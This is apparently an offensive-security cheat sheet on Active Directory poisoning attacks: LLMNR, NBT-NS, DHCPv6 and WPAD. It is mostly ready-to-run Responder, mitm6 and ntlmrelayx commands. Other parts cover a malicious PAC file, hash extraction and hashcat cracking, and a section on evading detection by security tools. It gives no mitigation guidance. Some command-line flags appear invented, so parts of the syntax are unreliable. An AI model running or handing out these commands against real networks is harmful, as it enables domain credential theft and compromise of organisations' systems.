Poisoning Attacks
Understanding AD Poisoning Attacks
Core Concept
Purpose: Intercept and respond to Windows name resolution requests to capture domain NTLM authentication credentials.
Attack Flow:
AD Client → Broadcast Request → Attacker Response → Client Authentication → Domain Credential CaptureDomain-joined Windows client fails to resolve a name via DNS
Client broadcasts name resolution request using Windows protocols
Attacker responds claiming to be the requested service
Client authenticates to attacker using domain NTLM credentials
Attacker captures domain NTLMv2 hash for offline cracking
Requirements: Network access on same subnet, Windows name resolution protocols enabled Attack Value: Domain credential harvesting without requiring initial system access
LLMNR Poisoning
Link-Local Multicast Name Resolution (LLMNR)
Purpose: Poison LLMNR requests to capture Windows domain authentication credentials.
Requirements: Windows clients with LLMNR enabled (default), multicast traffic allowed
Attack Value: Highest success rate in AD environments, captures domain credentials directly
Basic LLMNR Poisoning with Responder
# Standard LLMNR poisoning for domain credentials
sudo responder -I eth0 -wrf
# LLMNR poisoning with analysis mode (capture only)
sudo responder -I eth0 -A
# Selective protocol poisoning
sudo responder -I eth0 -w -r -f --lm
# LLMNR with verbose output for domain analysis
sudo responder -I eth0 -wrf -v
# Custom challenge for faster hash cracking
sudo responder -I eth0 -wrf --challenge 1122334455667788Advanced LLMNR Configuration for AD
# Edit Responder configuration for AD environment
sudo nano /etc/responder/Responder.conf
# Optimize for AD domain credentials:
# [Responder Core]
# SMB = On # Critical for domain authentication
# HTTP = On # Web-based domain auth
# HTTPS = On # Secure web domain auth
# LDAP = On # AD LDAP authentication
# SQL = On # Domain SQL Server auth
# DNS = Off # Disable to avoid noise
# Run with AD-optimized config
sudo responder -I eth0 -wrf --config /path/to/ad_config.confLLMNR Attack Optimization for AD
# Target AD-specific protocols only
sudo responder -I eth0 --disable-ess # Disable non-essential services
# Focus on SMB for domain authentication
sudo responder -I eth0 -rf # SMB and LDAP only
# Multiple interface monitoring in AD networks
sudo responder -I eth0,eth1 -wrf
# LLMNR with forced WPAD authentication for domain users
sudo responder -I eth0 -wrf --force-wpad-authNBT-NS Poisoning
NetBIOS Name Service Poisoning for AD
Purpose: Poison NetBIOS name resolution requests to capture domain credentials from Windows systems.
Requirements: NetBIOS over TCP/IP enabled, Windows systems in AD domain
Attack Value: Effective against legacy AD environments and older Windows domain clients
NBT-NS with Responder for Domain Credentials
# NBT-NS poisoning for domain authentication (included in standard Responder)
sudo responder -I eth0 -wrf
# NBT-NS targeting specific AD domain
sudo responder -I eth0 --NBTNSdomain COMPANY
# Legacy AD environment targeting
sudo responder -I eth0 --basic # Use basic HTTP auth for older systems
# NetBIOS browsing service poisoning in AD
sudo responder -I eth0 --browser-redirectAD-Specific NBT-NS Reconnaissance
# Discover AD domain systems via NetBIOS
nbtscan 192.168.1.0/24 | grep -E "(DOMAIN|<20>)"
# Enumerate AD domain membership
for ip in $(nmap -sn 192.168.1.0/24 | grep -oP '\d+\.\d+\.\d+\.\d+'); do
nmblookup -A $ip | grep -E "(DOMAIN|<00>|<20>)"
done
# Target domain controllers specifically
enum4linux -a <DC-IP> | grep -i "domain\|workgroup"DHCPv6 Poisoning for AD Environments
IPv6 DHCP Poisoning with AD DNS Takeover
Purpose: Use IPv6 DHCPv6 to become the DNS server for Windows AD clients and capture all authentication attempts.
Requirements: IPv6 enabled Windows AD clients, DHCPv6 client support
Attack Value: Complete DNS control over AD clients, bypasses SMB signing, captures all domain authentication
mitm6 - Advanced IPv6 Attack for AD
# Basic DHCPv6 DNS takeover for AD domain
sudo mitm6 -d company.com
# DHCPv6 with AD domain filtering
sudo mitm6 -d company.com --ignore-nofqdn
# DHCPv6 targeting specific AD hosts
echo "dc01.company.com" > ad_targets.txt
echo "exchange.company.com" >> ad_targets.txt
sudo mitm6 -d company.com --host-allowlist ad_targets.txt
# DHCPv6 with AD relay integration
sudo mitm6 -d company.com --relay-target <DC-IP>DHCPv6 + NTLM Relay for AD Compromise
# Terminal 1: IPv6 DNS takeover
sudo mitm6 -d company.com --ignore-nofqdn
# Terminal 2: NTLM relay to AD services
python3 ntlmrelayx.py -6 -t ldaps://<DC-IP> --escalate-user <username>
# Terminal 3: Monitor domain authentication
tail -f /var/log/mitm6.log | grep -E "(DOMAIN|company\.com)"WPAD Poisoning in AD Environments
Web Proxy Auto-Discovery for Domain Credentials
Purpose: Exploit automatic proxy configuration to intercept web traffic and capture domain user credentials.
Requirements: WPAD enabled in browsers, automatic proxy detection, domain users accessing web resources
Attack Value: Captures domain credentials when users authenticate to web applications through proxy
WPAD Attack with Responder for AD
# WPAD poisoning for domain user credentials
sudo responder -I eth0 -wrf --wpad
# WPAD targeting AD domain users
sudo responder -I eth0 --wpad-domain company.com
# WPAD via DHCPv6 for Windows AD clients
sudo responder -I eth0 --dns-wpad --dhcpv6-wpadCustom WPAD for AD Credential Harvesting
# Create AD-targeted PAC file
cat > wpad.pac << 'EOF'
function FindProxyForURL(url, host) {
// Target internal AD resources
if (shExpMatch(host, "*.company.com") ||
shExpMatch(host, "sharepoint*") ||
shExpMatch(host, "exchange*")) {
return "PROXY <attacker-ip>:8080";
}
return "DIRECT";
}
EOF
# Serve WPAD file targeting AD services
python3 -m http.server 80 --directory /path/to/wpad/Integrated AD Poisoning Workflows
Comprehensive AD Credential Harvesting
# Multi-protocol AD poisoning campaign
# Terminal 1: IPv6 attack for modern Windows AD clients
sudo mitm6 -d company.com --ignore-nofqdn
# Terminal 2: IPv4 poisoning for all AD systems
sudo responder -I eth0 -wrf -v
# Terminal 3: Monitor for domain credentials
tail -f /usr/share/responder/logs/*.txt | grep -E "(COMPANY\\|company\.com)"Targeted AD Poisoning with Relay
# Phase 1: Poisoning for AD credential capture
sudo responder -I eth0 -A # Analysis mode only
# Phase 2: Relay captured AD authentication
python3 ntlmrelayx.py -tf ad_targets.txt -smb2support
# Phase 3: Force AD authentication via poisoning
# Access non-existent AD service: \\fake-dc\sysvol
net use \\fake-server\netlogonHigh-Value AD Target Identification
# Monitor for administrative AD accounts
grep -iE "(admin|service|backup|sql|exchange)" /usr/share/responder/logs/*.txt
# Filter for domain controller authentication
grep -E "(DC[0-9]+|PDC|BDC)" /usr/share/responder/logs/*.txt
# Identify service accounts in AD
grep -E "svc-|service|sql|exchange|backup" /usr/share/responder/logs/*.txtAD-Specific Defense Evasion
Stealth Poisoning in AD Networks
# Selective poisoning to avoid AD security monitoring
sudo responder -I eth0 --analyze --duration 3600 # Analyze AD traffic first
# Target only AD-specific protocols
sudo responder -I eth0 --smb --ldap # Core AD protocols only
# Avoid detection by AD security tools
sudo responder -I eth0 --random-delay --custom-challenge
# Target specific AD subnets only
sudo responder -I eth0 --subnet 192.168.10.0/24 # AD client subnetBypassing AD Security Controls
# Use IPv6 to bypass IPv4-based AD protections
sudo mitm6 -d company.com --ignore-nofqdn
# WPAD-only poisoning to avoid LLMNR/NBT-NS detection
sudo responder -I eth0 --wpad-only
# Target AD service accounts specifically
sudo responder -I eth0 --target-service-accountsPost-Capture AD Credential Processing
Domain Credential Extraction and Analysis
# Extract domain credentials from captures
grep "COMPANY\\\\" /usr/share/responder/logs/*.txt > domain_creds.txt
# Format AD credentials for hashcat
cat /usr/share/responder/logs/*.txt | grep "NTLMv2-SSP Hash" | \
grep -E "(COMPANY\\\\|company\.com)" > ad_hashes.txt
# Identify high-value AD accounts
grep -iE "(admin|da-|service|sql|exchange|backup)" ad_hashes.txt
# Process for domain password cracking
sed 's/.*NTLMv2-SSP Hash : //' ad_hashes.txt > formatted_ad_hashes.txt
hashcat -m 5600 formatted_ad_hashes.txt /usr/share/wordlists/rockyou.txtAD Environment Validation
# Confirm domain environment capture
grep -E "DOMAIN\\\\|\.company\.com|DC=" /usr/share/responder/logs/*.txt
# Identify domain controllers from captures
grep -iE "(dc[0-9]+|domain.*controller)" /usr/share/responder/logs/*.txt
# Map AD infrastructure from poisoning
grep -E "(exchange|sharepoint|sql.*server)" /usr/share/responder/logs/*.txtAttack Success Indicators in AD
LLMNR/NBT-NS: Domain credentials in
DOMAIN\usernameformatDHCPv6: Complete DNS control over AD clients, all name resolution captured
WPAD: Domain user authentication to web applications and SharePoint
Cross-Protocol: Multiple AD service authentications (LDAP, SMB, HTTP)
High-Value Targets: Service accounts, administrative accounts, domain controllers
These AD-focused poisoning attacks provide the most effective initial credential harvesting in Windows domain environments, targeting protocols that are enabled by default and actively used by domain-joined systems.
Last updated
Was this helpful?